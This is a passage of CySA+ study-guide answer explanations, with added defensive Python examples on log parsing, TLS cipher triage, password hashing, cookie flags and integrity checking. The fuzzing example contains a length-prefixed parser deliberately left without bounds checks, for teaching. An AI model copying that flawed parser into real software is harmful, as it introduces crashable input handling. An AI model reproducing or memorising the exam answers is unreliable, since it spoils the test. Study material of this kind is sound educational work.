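def ssha_verify(password: str, stored: str) -> bool:
    """Check a candidate password against a stored {SSHA} value."""
    if not stored.startswith(PREFIX):
        raise ValueError("not an {SSHA} value")
    raw = base64.b64decode(stored[len(PREFIX):])
    digest, salt = raw[:DIGEST_LEN], raw[DIGEST_LEN:]
    candidate = hashlib.sha1(password.encode("utf-8") + salt).digest()
    return hmac.compare_digest(candidate, digest)


def unsalted_sha(password: str) -> str:
    """OpenLDAP's {SHA} scheme for comparison: no salt, so equal passwords give
    equal stored values and one precomputed table cracks all of them."""
    digest = hashlib.sha1(password.encode("utf-8")).digest()
    return "{SHA}" + base64.b64encode(digest).decode("ascii")


if __name__ == "__main__":
    stored = ssha_hash("correct horse")
    print(stored, ssha_verify("correct horse", stored), ssha_verify("wrong", stored))
    print(unsalted_sha("correct horse"))
```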


D. Context-based authentication systems commonly take location, time of day, and 
user behavior into account. They do not normally consider the complexity of the user’s 
password. 


B. Firewall logs typically contain similar information to that contained in NetFlow 
records. However, the firewall does not always see the same traffic as the switches and 
routers that generate NetFlow records. While not a complete substitute, firewall logs do 
offer a good compensating control for the lack of NetFlow records. Routers and switches 
do not typically record traffic records in their standard logs; that is the function of 
NetFlow, which is unavailable on this network. Intrusion prevention systems (IPS) do not 
record routine traffic information. 


A. The OpenSSL library, despite its name, provides both SSL and TLS implementations and 
is the most widely used implementation of both in use today. OpenTLS, SecureSSL, and 
SecureTLS are nonexistent tools. 


B. Syslog severity ranges from 0 (emergency) to 7 (debug), with lower numbers representing 
higher severities. The value of 2 corresponds to a critical severity error. 
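On the wire, the severity travels combined with the facility in the message's PRI field, so a filter that wants "critical and worse" has to decode it first. The following is an added example (my code, not the book's) that decodes PRI values and keeps only messages at or above a chosen severity; the four messages are constructed, with PRI values chosen to give the facility and severity noted in the comments.

```python
"""Decode the syslog PRI field and filter by severity.  Added example; the
messages are constructed.  PRI = facility * 8 + severity, so severity is
PRI mod 8 (0 = emergency ... 7 = debug) and facility is PRI div 8."""
import re

SEVERITIES = ["emergency", "alert", "critical", "error",
              "warning", "notice", "informational", "debug"]
FACILITIES = ["kern", "user", "mail", "daemon", "auth", "syslog", "lpr", "news",
              "uucp", "cron", "authpriv", "ftp", "ntp", "audit", "alert", "clock"]
FACILITIES += ["local%d" % i for i in range(8)]

PRI_RE = re.compile(r"^<(\d{1,3})>(.*)$", re.S)

SAMPLE = [
    "<34>Mar  4 10:21:03 fw01 sshd[412]: host key for 10.0.1.5 changed",  # auth(4), critical(2)
    "<13>Mar  4 10:21:04 web01 app: user login ok",                       # user(1), notice(5)
    "<3>Mar  4 10:21:05 db01 kernel: I/O error on sda",                   # kern(0), error(3)
    "<165>Mar  4 10:21:06 host5 myapp: starting up",                      # local4(20), notice(5)
]


def decode_pri(message):
    """Return (facility_name, severity_name, severity_number, remainder)."""
    m = PRI_RE.match(message)
    if not m:
        raise ValueError("message has no <PRI> field")
    pri = int(m.group(1))
    if pri > 191:                      # 23 * 8 + 7 is the largest legal value
        raise ValueError("PRI out of range")
    facility, severity = divmod(pri, 8)
    return FACILITIES[facility], SEVERITIES[severity], severity, m.group(2)


def at_or_above(messages, worst_allowed):
    """Messages whose numeric severity is <= worst_allowed (lower = more severe);
    worst_allowed=2 keeps emergency, alert and critical only."""
    kept = []
    for msg in messages:
        facility, name, number, body = decode_pri(msg)
        if number <= worst_allowed:
            kept.append((facility, name, body))
    return kept


if __name__ == "__main__":
    for item in at_or_above(SAMPLE, 3):
        print(item)
```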


D. Fuzz testing involves sending invalid or random data to an application to test its ability 
to handle unexpected data. Fault injection directly inserts faults into error handling paths, 
particularly error handling mechanisms that are rarely used or might otherwise be missed 
during normal testing. Mutation testing is related to fuzzing and fault injection but rather 
than changing the inputs to the program or introducing faults to it, mutation testing 
makes small modifications to the program itself. Stress testing is a performance test that 
ensures applications and the systems that support them can stand up to the full produc- 
tion load. 


B. Of the solutions presented, a passcode sent via SMS to a cell phone is the best option, 
even though SMS is a weak authenticator in general. The designer of the system should 
verify that the number is served by a mobile carrier rather than a VoIP service, since 
VoIP numbers can be obtained or redirected without possession of a handset. Security 
questions are not considered strong authentication, as they can often be answered by 
someone other than the individual. Emailing a link to a password reset web page would 
not work because if the user does not have access to his or her central authentication 
account, he or she is unlikely to be able to receive the email. Similarly, the two-factor 
authentication option presented would not work because the user has presumably forgotten 
his or her password. 


B. John the Ripper is a password cracking tool used to retrieve plain-text passwords from 
hashed password stores. 


C. The first entry in the log indicates that the user authenticated from the system 
10.174.238.88. 


C. The second log entry indicates that the sshd daemon handled the connection. This 
daemon supports the Secure Shell (SSH) protocol. 


B. The first log entry indicates that the user made use of public key authentication for 
the connection. The user therefore possessed the private key corresponding to a public 
key stored on the server and associated with that account. 


B. The identity of the user making the connection appears in the first log entry: 
accepted publickey for ec2-user. The third log entry that contains the string 
USER=root is recording the fact that the user issued the sudo command to create an inter- 
active bash shell with administrative privileges. This is not the account used to create the 
server connection. The pam_unix entry indicates that the session was authenticated using 
the pluggable authentication module (PAM) facility. 
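The four log questions above are answered by reading sshd and sudo entries by eye; the following is an added example (my code, not the book's) that turns the same kinds of entries into structured events and attributes a root shell to the account that actually connected. The log lines are constructed in the standard syslog formats sshd and sudo produce; the user, source address and USER=root values reuse those from the answers above, the fingerprint and the failed-login line are invented.

```python
"""Parse sshd/sudo log entries into events and attribute root shells to the
connecting account.  Added example; SAMPLE_LOG is constructed."""
import re

SAMPLE_LOG = """\
Mar  4 10:21:03 ip-10-0-1-77 sshd[2071]: Accepted publickey for ec2-user from 10.174.238.88 port 51512 ssh2: RSA SHA256:constructedFingerprintValue000000000000000
Mar  4 10:21:03 ip-10-0-1-77 sshd[2071]: pam_unix(sshd:session): session opened for user ec2-user by (uid=0)
Mar  4 10:21:09 ip-10-0-1-77 sudo:  ec2-user : TTY=pts/0 ; PWD=/home/ec2-user ; USER=root ; COMMAND=/bin/bash
Mar  4 10:21:09 ip-10-0-1-77 sudo: pam_unix(sudo:session): session opened for user root by ec2-user(uid=0)
Mar  4 10:22:41 ip-10-0-1-77 sshd[2113]: Failed password for invalid user admin from 203.0.113.9 port 40022 ssh2
"""

ACCEPTED_RE = re.compile(r"sshd\[(\d+)\]: Accepted (\w+) for (\S+) from (\S+) port (\d+)")
FAILED_RE = re.compile(r"sshd\[(\d+)\]: Failed (\w+) for (?:invalid user )?(\S+) from (\S+) port (\d+)")
SUDO_RE = re.compile(r"sudo:\s+(\S+) : TTY=(\S+) ; PWD=(\S+) ; USER=(\S+) ; COMMAND=(.*)$")
SHELLS = {"/bin/bash", "/bin/sh", "/bin/zsh", "/usr/bin/bash", "/bin/su"}


def parse_auth_log(text):
    """One dict per login, failed login or sudo invocation; pam_unix lines are skipped."""
    events = []
    for line in text.splitlines():
        m = ACCEPTED_RE.search(line)
        if m:
            events.append({"type": "login", "method": m.group(2), "user": m.group(3),
                           "src": m.group(4), "port": int(m.group(5))})
            continue
        m = FAILED_RE.search(line)
        if m:
            events.append({"type": "failed", "method": m.group(2), "user": m.group(3),
                           "src": m.group(4), "port": int(m.group(5))})
            continue
        m = SUDO_RE.search(line)
        if m:
            events.append({"type": "sudo", "user": m.group(1), "tty": m.group(2),
                           "target": m.group(4), "command": m.group(5).strip()})
    return events


def root_shells(events):
    """(user, source_ip) pairs where an account logged in and then used sudo to
    start a shell as root.  The connecting account, not root, is the one the
    session should be attributed to."""
    last_src = {}
    found = []
    for e in events:
        if e["type"] == "login":
            last_src[e["user"]] = e["src"]
        elif (e["type"] == "sudo" and e["target"] == "root"
              and e["command"].split()[0] in SHELLS):
            found.append((e["user"], last_src.get(e["user"])))
    return found


if __name__ == "__main__":
    evs = parse_auth_log(SAMPLE_LOG)
    for e in evs:
        print(e)
    print(root_shells(evs))
```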


B. The user at this IP address is requesting the robots.txt file. This file is generally only 
requested by automated crawlers, such as those operated by search engines, seeking to 
determine whether they are permitted to browse the site. 


C. The requests from this IP address appear to be normal requests for a web page and 
two associated image files. There is no indication that this comes from any source other 
than a normal user. 


D. From the information presented, Maggie cannot identify any insecure or outdated 
components. There is no evidence in the logs that the server is running SSL, and the TLS 
version referenced in the logs (version 1.2) is current. The fact that the file is named 
ssl_request_log does not mean that the server necessarily supports SSL, as TLS records 
are written to that file as well. The cipher suites specified in the logs (ECDHE-RSA-
AES256-SHA384 and ECDHE-RSA-AES256-GCM-SHA384) contain no insecure or outdated 
components, although the first is a CBC-mode suite, and current hardening guidance 
prefers AEAD (GCM or ChaCha20-Poly1305) suites over CBC. 


A. All of the connections recorded in these log entries make use of TLS-encrypted 
connections. This does not, however, allow Maggie to conclude that the server prohibits 
unencrypted connections, because she is reviewing the ssl_request_log file, which would 
not contain information about unencrypted connections. The server does appear to allow 
web crawlers, as shortly after the system at 157.55.39.18 requests the robots.txt file, 
another system from the same subnet requests the front page of the site. There is not 
enough information in this log file to draw conclusions about network access restrictions. 
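The following is an added example (my code, not the book's) of the triage the two ssl_request_log questions above perform by hand: parse each entry, flag outdated protocol versions and weak or legacy cipher suites, and collect the addresses that fetched robots.txt. The lines are constructed in Apache's default ssl_request_log format (`%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x "%r" %b`); two of them reuse the TLS 1.2 suites and the 157.55.39.18 crawler address from the answers above, and the TLSv1/RC4 line is added so the flagged case is visible.

```python
"""Triage Apache ssl_request_log entries for protocol, cipher and crawler
activity.  Added example; SAMPLE_LOG is constructed."""
import re

SAMPLE_LOG = """\
[04/Mar/2018:10:21:03 -0500] 157.55.39.18 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384 "GET /robots.txt HTTP/1.1" 125
[04/Mar/2018:10:21:05 -0500] 157.55.39.22 TLSv1.2 ECDHE-RSA-AES256-SHA384 "GET / HTTP/1.1" 10431
[04/Mar/2018:10:21:40 -0500] 198.51.100.14 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384 "GET /images/logo.png HTTP/1.1" 4096
[04/Mar/2018:10:22:17 -0500] 198.51.100.77 TLSv1 RC4-SHA "GET / HTTP/1.1" 10431
"""

LINE_RE = re.compile(r'^\[([^\]]+)\] (\S+) (\S+) (\S+) "([A-Z]+) (\S+) [^"]*" (\S+)$')
OUTDATED_PROTOCOLS = {"SSLv2", "SSLv3", "TLSv1", "TLSv1.1"}
WEAK_CIPHER_TOKENS = {"RC4", "DES", "3DES", "NULL", "EXP", "EXPORT", "MD5", "ADH", "AECDH"}


def parse_line(line):
    m = LINE_RE.match(line)
    if not m:
        return None
    ts, src, proto, cipher, method, path, size = m.groups()
    return {"time": ts, "src": src, "protocol": proto, "cipher": cipher,
            "method": method, "path": path, "bytes": size}


def cipher_findings(cipher):
    """Issues with an OpenSSL-style suite name; empty means nothing to flag."""
    tokens = set(cipher.replace("-", "_").split("_"))
    issues = [t for t in sorted(WEAK_CIPHER_TOKENS) if t in tokens]
    if not issues and "GCM" not in tokens and "CHACHA20" not in tokens:
        # Not broken in TLS 1.2, but CBC suites are disabled in current hardening guides.
        issues.append("CBC (non-AEAD) suite")
    return issues


def triage(text):
    report = {"outdated_protocol": [], "weak_cipher": [], "legacy_cipher": [], "crawlers": set()}
    for line in text.splitlines():
        e = parse_line(line)
        if not e:
            continue
        if e["protocol"] in OUTDATED_PROTOCOLS:
            report["outdated_protocol"].append((e["src"], e["protocol"]))
        issues = cipher_findings(e["cipher"])
        if any(i in WEAK_CIPHER_TOKENS for i in issues):
            report["weak_cipher"].append((e["src"], e["cipher"]))
        elif issues:
            report["legacy_cipher"].append((e["src"], e["cipher"]))
        if e["path"] == "/robots.txt":
            report["crawlers"].add(e["src"])
    return report


if __name__ == "__main__":
    for key, value in triage(SAMPLE_LOG).items():
        print(key, value)
```

As the answers above note, this file says nothing about plaintext connections; to check whether HTTP is accepted at all you need the ordinary access log or the listener configuration, not ssl_request_log.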
D. Endpoint security suites typically include host firewalls, host intrusion prevention 
systems (IPS), and antimalware software. Virtual private network (VPN) technology is 
normally a core component of the operating system or uses software provided by the VPN 
vendor. 


D. Lean Six Sigma is a process improvement approach that includes streamlining pro- 
cesses to make them more effective. Regression testing is a type of software/system testing 
used during the QA process. Waterfall and agile are software development methodologies. 


D. The Qualys vulnerability scanner is a widely used, commercial vulnerability scanning 
product. OpenVAS is also a network vulnerability scanner, but it is an open source project 
rather than a commercial product. 


A. The Microsoft Baseline Security Analyzer (MBSA) is a Microsoft-provided tool used 
specifically to scan the security settings on Windows devices. 


C. Nikto is an open source web vulnerability scanner. Acunetix is also a web vulnerabil- 
ity scanner, but it is a commercial product. OpenVAS is an open source vulnerability scan- 
ner, but it is not dedicated to web application scanning. Nexpose is a commercial network 
vulnerability scanner. 


C. Cacti, Nagios, and MRTG are all open source network monitoring tools, while SolarWinds 
is a commercial alternative. 


A. Syslog provides a standardized logging facility that works across a wide variety of 
operating systems and devices. Event Viewer and SCCM are Microsoft-specific technolo- 
gies, while Prime is a Cisco-specific technology. 


C. Security through obscurity is not a good practice. You should not rely upon the 
secrecy of the control (e.g., the location of the web interface) as a security measure. 
Therefore, obscuring web interface locations is not included on the OWASP security 
controls list. 


B. The result shows a different hash value for the same file on two different runs. This 
means that the file was definitely modified between the two runs of shasum. If the file 
were intact, the two values would be identical. If the file were removed, Javier would 
receive an error on the second run. 
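Both hash-comparison questions above (the SHA value that matched between Wednesday and Friday, and Javier's shasum runs that differed) rely on the same check. The following is an added example (my code, not the book's) that implements it with the three outcomes kept distinct: intact, modified, and missing. It uses SHA-256, so `shasum -a 256` produces the same hex string; the file content is constructed.

```python
"""Hash-based file integrity check with intact / modified / missing outcomes.
Added example; the file content written in demo() is constructed."""
import hashlib
import hmac
import os
import tempfile


def digest_bytes(data: bytes, algorithm: str = "sha256") -> str:
    return hashlib.new(algorithm, data).hexdigest()


def file_digest(path: str, algorithm: str = "sha256") -> str:
    """Stream the file so large files do not have to fit in memory."""
    h = hashlib.new(algorithm)
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def check(path: str, baseline_hex: str) -> str:
    """Return 'missing', 'intact' or 'modified' for path against a stored digest."""
    if not os.path.exists(path):
        return "missing"
    current = file_digest(path)
    # The hex digest is not a secret, so a constant-time compare is not strictly
    # needed here; it is the habit to keep for comparisons involving MACs or tokens.
    return "intact" if hmac.compare_digest(current, baseline_hex) else "modified"


def demo() -> list:
    """Walk a temporary file through the three outcomes; returns the verdicts."""
    verdicts = []
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "httpd.conf")
        with open(path, "wb") as f:
            f.write(b"ServerTokens Prod\n")
        baseline = file_digest(path)          # the "Wednesday" value
        verdicts.append(check(path, baseline))  # unchanged on "Friday": intact
        with open(path, "ab") as f:
            f.write(b"LoadModule extra_module modules/mod_extra.so\n")
        verdicts.append(check(path, baseline))  # bytes differ: modified
        os.remove(path)
        verdicts.append(check(path, baseline))  # gone: missing, not an error
    return verdicts


if __name__ == "__main__":
    print(demo())
```

The baseline is only as trustworthy as where it is kept: a digest stored on the same host as the file can be rewritten by whoever modified the file, so keep baselines off-box or in a signed manifest.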


D. Identities are used as part of the authentication, authorization, and accounting (AAA) 
framework that is used to control access to computers, networks, and services. AAA 
systems authenticate users by requiring credentials such as a username, a password, and 
possibly a biometric or token-based authenticator. Once individuals have proven who they 
are, they are then authorized to access or use resources or systems. Authorization applies 
policies based on the user's identity information and rules or settings, allowing the owner 
of the identity to perform actions or to gain access to systems. The accounting element 
of the AAA process is the logging and monitoring that goes with the authentication and 
authorization. Accounting monitors usage and provides information about how and what 
users are doing. 
C. Tim should set the Secure attribute on the cookie so that the browser sends it only 
over an encrypted connection. Serving the web application over TLS does not by itself 
guarantee this: a browser will still attach the cookie to any http:// request for the same 
host, such as a link or image an attacker injects, exposing it on the wire. HttpOnly, 
which keeps scripts from reading the cookie, and SameSite are worth setting at the same 
time. Hashing the cookie value would not change how it is transmitted and would not 
improve the security of the application. 
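The following is an added example (my code, not the book's) that audits a Set-Cookie header for the Secure flag and the two attributes that usually travel with it, and builds the hardened form. The cookie names and values are constructed.

```python
"""Audit Set-Cookie headers for Secure/HttpOnly/SameSite and build a hardened one.
Added example; the cookie values are constructed."""


def parse_set_cookie(header: str):
    """Split 'name=value; Attr; Attr=val' into (name, value, {attr_lower: val|True})."""
    parts = [p.strip() for p in header.split(";") if p.strip()]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for p in parts[1:]:
        k, _, v = p.partition("=")
        attrs[k.strip().lower()] = v.strip() if v else True
    return name.strip(), value, attrs


def audit_set_cookie(header: str):
    """Return a list of findings; an empty list means the cookie is flagged correctly."""
    name, _, attrs = parse_set_cookie(header)
    findings = []
    if "secure" not in attrs:
        findings.append(f"{name}: missing Secure; the browser will also send it over http://")
    if "httponly" not in attrs:
        findings.append(f"{name}: missing HttpOnly; readable by script, so stealable via XSS")
    samesite = str(attrs.get("samesite", "")).lower()
    if samesite not in ("lax", "strict"):
        findings.append(f"{name}: SameSite not Lax/Strict; sent on cross-site requests")
    return findings


def harden(name: str, value: str, path: str = "/", max_age: int = None) -> str:
    """Build a Set-Cookie header with the attributes a session cookie should carry."""
    pieces = [f"{name}={value}", f"Path={path}", "Secure", "HttpOnly", "SameSite=Lax"]
    if max_age is not None:
        pieces.append(f"Max-Age={max_age}")
    return "; ".join(pieces)


if __name__ == "__main__":
    weak = "session=abc123; Path=/"
    print(audit_set_cookie(weak))
    print(harden("session", "abc123", max_age=3600))
    print(audit_set_cookie(harden("session", "abc123")))
```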


A. Rootkits combine multiple malicious software tools to provide continued access to a 
system while hiding their own existence. Fighting rootkits requires a full suite of system 
security practices, ranging from proper patching and layered security design to antimal- 
ware techniques such as whitelisting, heuristic detection, and malicious software detection 
tools. 


A. Unfortunately, the RADIUS protocol supports only the weak MD5 hash function for 
protecting passwords and authenticating packets. This is one of the major criticisms of 
RADIUS. 


C. Laura can determine that the nytimes.com domain uses Google for email services, 
as there is a mail exchanger (MX) record pointing to a Google address and routing 
mail for the domain to Google. The server located at 66.205.160.99 is the server that 
answered this DNS query, which is not necessarily operated by the nytimes.com domain. 
The results appear to show that there are multiple web servers hosting the nytimes.com 
domain, but there is no evidence that Google Analytics is used in these results. 


A. All of these information sources may provide clues to the identity of the individual who 
installed the software. However, the server logs are likely to contain records of software 
installation and associate them with a user ID. This is the source that is most likely able to 
provide the most direct answer to Cody’s question in the shortest possible time period. 


B. The unauthorized use of computing resources is normally a violation of an organiza- 
tion’s acceptable use policy. It is quite unlikely that the organization has a specific policy 
that addresses the mining of Bitcoin or other cryptocurrencies. Information classification 
and identity management policies generally do not address misuse of resources. 


D. Configuration management tools are able to detect the installation of new software, 
helping analysts quickly identify cases of unauthorized software installation. Authentica- 
tion anomaly detection and intrusion prevention controls are unlikely to detect this issue 
because the employee likely does have authorization to connect to the server and is simply 
misusing authorized access privileges. The installation of software that does not listen on 
a network port, such as cryptocurrency mining software, is unlikely to be detected with 
vulnerability scanning. 


C. Xavier could address this issue by hiring an external security-as-a-service (SECaaS) 
provider that specializes in malware analysis. Infrastructure (IaaS), platform (PaaS) and 
identity management (IDaaS) services would not provide malware analysis capabilities. 


C. Imperva, NAXSI, and ModSecurity are all web application firewall options that Glenn 
should consider. Network General is a former manufacturer of network analysis equip- 
ment that was acquired by NetScout in 2007. Bafflingly, Network General is still included 
on the CompTIA CySA+ objectives as required knowledge. 


D. Fuzz testing works by dynamically manipulating input to an application in an effort 
to induce a flaw. This technique is useful in detecting places where a web application does 
not perform proper input validation. It can also be used against XML input, TCP/IP 
communications and other protocols. Fuzz testing is not commonly used against firewall 
rules. Note that this question mentions the Untidy fuzzer. This product was an XML 
fuzzer that no longer exists because it was folded into the Peach fuzzing tool. However, 
CompTIA included it as an exam objective for the CySA+ exam. Therefore, you should 
associate the name with XML fuzz testing if you see it on the exam. 
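The two fuzzing answers above describe the technique in prose; the following is an added example (my code, not from the book, Peach or Untidy) of a minimal mutation fuzzer. It starts from a valid input, applies random mutations, feeds each result to a parser, and records inputs that make the parser fail outside its own rejection path. The record format and both parsers are constructed for the illustration: the unchecked parser trusts its length byte, which is exactly the kind of missing bounds check fuzzing surfaces, and the checked parser is the hardened form.

```python
"""Minimal mutation fuzzer against a length-prefixed record parser.
Added example; the record format and parsers are constructed.  ValueError is
the parser's deliberate rejection; any other exception counts as a crash."""
import random

MAX_LEN = 64


def parse_record_unchecked(data: bytes) -> bytes:
    """Record = [len][payload...][checksum].  Trusts the length byte."""
    n = data[0]                      # IndexError on empty input
    payload = data[1:1 + n]
    checksum = data[1 + n]           # IndexError when len(data) < n + 2
    if sum(payload) & 0xFF != checksum:
        raise ValueError("bad checksum")
    return payload


def parse_record_checked(data: bytes) -> bytes:
    """Same format with the bounds checks the unchecked version lacks."""
    if len(data) < 2:
        raise ValueError("too short")
    n = data[0]
    if len(data) != n + 2:
        raise ValueError("length field does not match input")
    payload, checksum = data[1:1 + n], data[1 + n]
    if sum(payload) & 0xFF != checksum:
        raise ValueError("bad checksum")
    return payload


def make_record(payload: bytes) -> bytes:
    return bytes([len(payload)]) + payload + bytes([sum(payload) & 0xFF])


def mutate(data: bytes, rng: random.Random) -> bytes:
    """One random mutation: bit flip, byte replace, insert, delete or truncate."""
    b = bytearray(data)
    op = rng.randrange(5)
    if op == 0 and b:
        i = rng.randrange(len(b))
        b[i] ^= 1 << rng.randrange(8)
    elif op == 1 and b:
        b[rng.randrange(len(b))] = rng.randrange(256)
    elif op == 2 and len(b) < MAX_LEN:
        b.insert(rng.randrange(len(b) + 1), rng.randrange(256))
    elif op == 3 and b:
        del b[rng.randrange(len(b))]
    elif op == 4 and b:
        del b[rng.randrange(len(b)):]
    return bytes(b)


def fuzz(target, seed_input: bytes, iterations: int = 2000, seed: int = 1) -> dict:
    """Return {crashing_input: exception_name}.  Inputs the target accepts join the
    corpus so later mutations explore further from the seed."""
    rng = random.Random(seed)        # fixed seed so a run is reproducible
    crashes = {}
    corpus = [seed_input]
    for _ in range(iterations):
        candidate = mutate(rng.choice(corpus), rng)
        try:
            target(candidate)
        except ValueError:
            continue                 # rejected on purpose: not a bug
        except Exception as exc:     # anything else is a bug in the target
            crashes.setdefault(candidate, type(exc).__name__)
            continue
        corpus.append(candidate)
    return crashes


if __name__ == "__main__":
    seed_record = make_record(b"hello")
    found = fuzz(parse_record_unchecked, seed_record)
    print(len(found), "crashing inputs, e.g.", next(iter(found.items())))
    print(len(fuzz(parse_record_checked, seed_record)), "crashes in the checked parser")
```

In a real harness the target would be a process and a crash would be a signal or sanitizer report rather than a Python exception, but the loop (seed, mutate, run, classify, keep interesting inputs) is the same one Peach and its predecessors automate.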


C. While all of these control documents may contain information helpful to Lynda, the 
application software security control is the one most likely to contain information relevant 
to incorporating security into the SDLC. 
B. The sudden drop to zero is most likely to be an example of link failure. A denial-of-
service attack could result in this type of drop but is less likely for most organizations. 
High bandwidth consumption and beaconing both show different traffic patterns than 
shown in this example. 


C. This is fundamentally a dispute about data ownership. Charlotte’s co-worker is assert- 
ing that her department owns the data in question, and Charlotte disagrees. While the 
other policies mentioned may have some relevant information, Charlotte should first turn 
to the data ownership policy to see whether it reinforces or undermines her co-worker’s 
data ownership claim. 


B. During an incident recovery effort, patching priority should be placed upon systems 
that were directly involved in the incident. This is one component of remediating known 
issues that were actively exploited. 


B. Signature-based attack detection methods rely on knowing what an attack or malware 
looks like. Zero-day attacks are unlikely to have an existing signature, making them a 
poor choice to prevent them. Heuristic (behavior) detection methods can indicate compro- 
mises despite the lack of signatures for the specific exploit. Leveraging threat intelligence 
to understand new attacks and countermeasures is an important part of defense against 
zero-day attacks. Building a well-designed and segmented network can limit the impact of 
compromises or even prevent them. 


D. The Windows registry, the NTFS Master File Table (MFT), and INDX directory index 
files all contain information about files, often including removed or deleted files. 
Event logs are far less likely to contain information about a specific file location. 


C. Since Emily’s organization uses WPA2 enterprise, users must authenticate to use 
the wireless network. Associating the scan with an authenticated user will help incident 
responders identify the device that conducted the scan. 


A. Normally, forensic images are collected from systems that are offline to ensure that a 
complete copy is made. In cases like this, where keeping the system online is more 
important than the completeness of the forensic image, a live image to an external drive 
using a portable forensic tool such as FTK Imager Lite, dd, or similar is the correct choice. 
B. Accidental threats occur when individuals doing their routine work mistakenly perform 
an action that undermines security. In this case, Maria's actions were an example of an 
accident that caused an availability issue. 


A. When nmap returns a response of “filtered,” it indicates that nmap cannot tell whether 
the port is open or closed. Filtered results are often the result of a firewall or other 
network device, but a response of filtered does not indicate that a firewall or IPS was 
detected. When nmap returns a “closed” result, it means that there is no application 
listening at that moment. 


D. Although vulnerability scanning is an important security control, HIPAA does not 
offer specific requirements for scanning frequency. However, Darcy would be well advised 
to implement vulnerability scanning as a best practice, and daily or weekly scans are 
advisable. 


C. The likeliest issue is a problem with the NTP synchronization for both of the hosts, 
because of an improperly set time zone or another time issue. The ruleset only allows traf- 
fic initiated by host A, making it impossible for host B to be the source of a compromise of 
A. The other answers are possible, but the most likely issue is an NTP problem. 


D. The most serious vulnerabilities shown in this report are medium-severity vulnerabili- 
ties. Server D has the highest number (8) of vulnerabilities at that severity level. 


C. When an event of the type that is being analyzed has occurred within the recent past 
(often defined as a year), assessments that review that event will normally classify the 
likelihood of occurrence as high since it has already occurred. 


C. The CEO’s suggestion is a reasonable approach to vulnerability scanning that is used 
in some organizations, often under the term continuous scanning. He should consider 
the request and the impact on systems and networks to determine a reasonable course of 
action. 


B. This is an example of an availability issue. If data had been modified, it would have 
been an integrity issue, while exposure of data would have been a confidentiality issue. 
Accountability from the outsourced vendor isn’t discussed in the question. 


D. The Technical Report will contain detailed information on a specific host and is 
designed for an engineer seeking to remediate the system. The PCI Technical Report 
would focus on credit card compliance issues, and there is no indication that this server is 
used for credit card processing. The Qualys Top 20 Report and Executive Report would 
contain summary information more appropriate for a management audience and would 
cover an entire network, rather than providing detailed information on a single system. 


D. Bob needs to perform additional diagnostics to determine the cause of the latency. 
Unfortunately for Bob, this chart does not provide enough information to determine 
why the maximum response time rises to high levels on a periodic basis. Since the events 
are not regularly timed, it is relatively unlikely that a scheduled task is causing the issue. 
Network cards do not have latency settings; latency is caused by network traffic, system 
response times, and similar factors. Increasing the speed of a network link may help with 
latency, but you do not have enough information to make that determination. 


C. This image shows a SYN-based port scan. The traffic is primarily made up of TCP 
SYN packets to a variety of common ports, which is typical of a SYN-based port scan. 


A. RADIUS sends passwords that are obfuscated by a shared secret and MD5 hash, 
meaning that its password security is not very strong. RADIUS traffic between the 
RADIUS network access server and the RADIUS server is typically encrypted using IPsec 
tunnels or other protections to protect the traffic. Kerberos and TACACS+ are alternative 
authentication protocols and are not required in addition to RADIUS. SSL is no longer 
considered secure and should not be used to secure the RADIUS tunnel. 


B. The most likely cause of this slowness is an incorrect block size. Block size is set using 
the bs flag and is defined in bytes. By default, dd uses a 512-byte block size, but this is far 
smaller than the block size of most modern disks. Using a larger block size will typically 
be much faster, and if you know the block size for the device you are copying, using its 
native block size can provide huge speed increases. This is set using a flag like bs=64k. 
The if and of flags adjust the input and output files, respectively, but there is no indica- 
tion that these are erroneous. The count flag adjusts the number of blocks to copy and 
should not be changed if Jake wants to image the entire disk. 


B. A honeypot is used by security researchers and practitioners to gather information 
about techniques and tools used by attackers. A honeypot will not prevent attackers from 
targeting other systems, and unlike a tarpit, it is not designed to slow down attackers. 
Typically, honeypot data must be analyzed to provide useful information that can be used 
to build IDS and IPS rules. 


B. Advanced persistent threats (APTs) are highly skilled attackers with advanced capabili- 
ties who are typically focused on specific objectives. To accomplish those objectives, they 
often obtain and maintain long-term access to systems and networks using powerful tools 
that allow them to avoid detection and to stay ahead of responders who attempt to remove 
them. 


B. Of these choices, the most useful metric would be the time required to resolve criti- 
cal vulnerabilities. This is a metric that is entirely within the control of the vulnerability 
remediation program and demonstrates the responsiveness of remediation efforts and 
the time that a vulnerability was present. The number of vulnerabilities resolved and the 
number of new vulnerabilities each month are not good measures of the program’s effec- 
tiveness because they depend upon the number of systems and services covered by the scan 
and the nature of those services. 


C. By default nmap scans 1,000 of the most common TCP ports. Mike only knows that 
the system he scanned had no reachable (open, filtered, or closed) TCP ports in that list. 


D. Once they are connected via a write blocker, a checksum is created (often using MD5 
or SHA1). If this hash matches the hash of forensic images, they exactly match, meaning 
that the drive’s contents were not altered and that no files were added to or deleted from 
the drive. 


C. While BIOS infections are relatively rare, some malware does become resident in the 
system’s firmware or BIOS. Once there, analysis of the hard drive will not show the infec- 
tion. If the desktop support team at Ben’s company has fully patched the system and no 
other systems are similarly infected, Ben’s next step should be to validate that elements of 
the system he did not check before, such as the BIOS, are intact. 


C. Wireshark includes the ability to export packets. In this case, Susan can select the 
GIF89a detail by clicking that packet and then export the actual image to a file that she 
can view. 


C. Audits are formal reviews of an organization’s security program or specific compli- 
ance issues conducted on behalf of a third party. Audits require rigorous, formal testing of 
controls and result in a formal statement from the auditor regarding the entity’s compli- 
ance. Audits may be conducted by internal audit groups at the request of management or 
by external audit firms, typically at the request of an organization’s governing body or a 
regulator. 


D. OpenVAS is an open source vulnerability scanning product. Qualys, Nessus, and Nex- 
pose are all vulnerability scanners but are commercial products that require paying license 
fees. 


C. Scanning the full range of TCP ports can be done using a SYN scan (-sS) and declar- 
ing the full range of possible ports (1-65535). Service version identification is enabled with 
the -sV flag. 


A. CompTIA considers patching to be part of the validation effort. This differs from the 
NIST standard process; however, CompTIA considers patching, permission checking and 
setting, scanning, and ensuring that logging is working to be parts of the validation process. 


D. Dan does not need to take any action. This is a very low criticality vulnerability (1/5), 
and it is likely not exploitable from outside the data center. It is not necessary to remediate 
this vulnerability, and there is no indication that it is a false positive report. Overall, this 
is a very clean scan result for a VPN server. 


C. This rule base contains a shadowed rule. The rule designed to deny requests to access 
blocked sites will never trigger because it is positioned below the rule that allows access to 
